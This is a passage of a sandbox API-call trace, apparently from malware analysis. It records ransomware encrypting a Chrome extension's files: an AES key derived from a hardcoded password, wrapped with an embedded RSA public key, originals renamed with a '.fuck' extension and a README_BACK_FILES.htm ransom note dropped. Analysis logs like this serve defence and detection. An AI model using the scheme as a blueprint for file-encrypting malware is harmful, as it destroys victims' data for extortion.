(hHash=0x29387f8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.865] CryptDeriveKey (in: hProv=0x293d018, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2938978) returned 1 [0248.866] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.866] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0248.866] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293d4e0) returned 1 [0248.866] CryptImportPublicKeyInfo (in: hCryptProv=0x293d4e0, dwCertEncodingType=0x1, pInfo=0x2930570*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29305a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29305a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2937af8) returned 1 [0248.866] CryptEncrypt (in: hKey=0x2937af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0248.866] CryptEncrypt (in: hKey=0x2937af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293dab8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293dab8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0248.866] WriteFile (in: hFile=0x5d54, lpBuffer=0x293dab8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293dab8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0248.868] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x5b, lpOverlapped=0x0) returned 1 [0248.869] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x5b, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x60) returned 1 [0248.869] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x60, lpOverlapped=0x0) returned 1 [0248.869] CloseHandle (hObject=0x5d50) returned 1 [0248.869] CloseHandle (hObject=0x5d54) returned 1 [0248.869] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), bFailIfExists=0) returned 1 [0248.873] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js", dwFileAttributes=0x0) returned 1 [0248.873] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.gsg")) returned 1 [0248.874] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.fuck")) returned 1 [0248.875] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.875] CryptDestroyKey (hKey=0x2938978) returned 1 [0248.875] CryptReleaseContext (hProv=0x293d018, dwFlags=0x0) returned 1 [0248.875] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0248.876] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0248.876] GetLastError () returned 0x0 [0248.876] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json")) returned 0x20 [0248.876] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0248.876] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.877] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.877] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0248.878] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293d018) returned 1 [0248.880] CryptCreateHash (in: hProv=0x293d018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0248.880] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.880] CryptHashData (hHash=0x29385b8, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.880] CryptDeriveKey (in: hProv=0x293d018, Algid=0x6610, hBaseData=0x29385b8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2938978) returned 1 [0248.880] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.880] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0248.880] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293da30) returned 1 [0248.881] CryptImportPublicKeyInfo (in: hCryptProv=0x293da30, dwCertEncodingType=0x1, pInfo=0x2931750*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931780*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931788*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2937378) returned 1 [0248.881] CryptEncrypt (in: hKey=0x2937378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0248.881] CryptEncrypt (in: hKey=0x2937378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293dc50*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293dc50*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0248.882] WriteFile (in: hFile=0x5d50, lpBuffer=0x293dc50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293dc50*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0248.883] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x2d5, lpOverlapped=0x0) returned 1 [0248.885] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2d5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2e0) returned 1 [0248.885] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x2e0, lpOverlapped=0x0) returned 1 [0248.893] CloseHandle (hObject=0x5d54) returned 1 [0248.893] CloseHandle (hObject=0x5d50) returned 1 [0248.893] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), bFailIfExists=0) returned 1 [0248.896] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0248.897] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.gsg")) returned 1 [0248.898] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.fuck")) returned 1 [0248.899] CryptDestroyHash (hHash=0x29385b8) returned 1 [0248.899] CryptDestroyKey (hKey=0x2938978) returned 1 [0248.899] CryptReleaseContext (hProv=0x293d018, dwFlags=0x0) returned 1 [0248.899] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0248.899] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x29385b8 [0248.911] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.911] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.911] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.912] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.912] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.912] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.912] GetLastError () returned 0x0 [0248.912] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json")) returned 0x20 [0248.913] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0248.914] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.914] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.915] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.915] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d700) returned 1 [0248.917] CryptCreateHash (in: hProv=0x293d700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.917] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.917] CryptHashData (hHash=0x2938978, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.917] CryptDeriveKey (in: hProv=0x293d700, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29378b8) returned 1 [0248.917] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.918] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.918] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293d898) returned 1 [0248.918] CryptImportPublicKeyInfo (in: hCryptProv=0x293d898, dwCertEncodingType=0x1, pInfo=0x29319c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29319f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29319f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937478) returned 1 [0248.918] CryptEncrypt (in: hKey=0x2937478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.918] CryptEncrypt (in: hKey=0x2937478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d5f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293d5f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.918] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293d5f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293d5f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.919] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf6, lpOverlapped=0x0) returned 1 [0248.921] CryptEncrypt (in: hKey=0x29378b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0248.921] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0248.921] CloseHandle (hObject=0x5d58) returned 1 [0248.921] CloseHandle (hObject=0x5d5c) returned 1 [0248.921] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0248.924] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0248.925] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.gsg")) returned 1 [0248.926] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.fuck")) returned 1 [0248.927] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.927] CryptDestroyKey (hKey=0x29378b8) returned 1 [0248.927] CryptReleaseContext (hProv=0x293d700, dwFlags=0x0) returned 1 [0248.927] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.927] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.927] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0248.927] AreFileApisANSI () returned 1 [0248.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.928] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.929] GetFileType (hFile=0x5d54) returned 0x1 [0248.929] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.930] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.930] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.930] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.930] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.930] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.930] GetLastError () returned 0x0 [0248.931] GetFileAttributesA 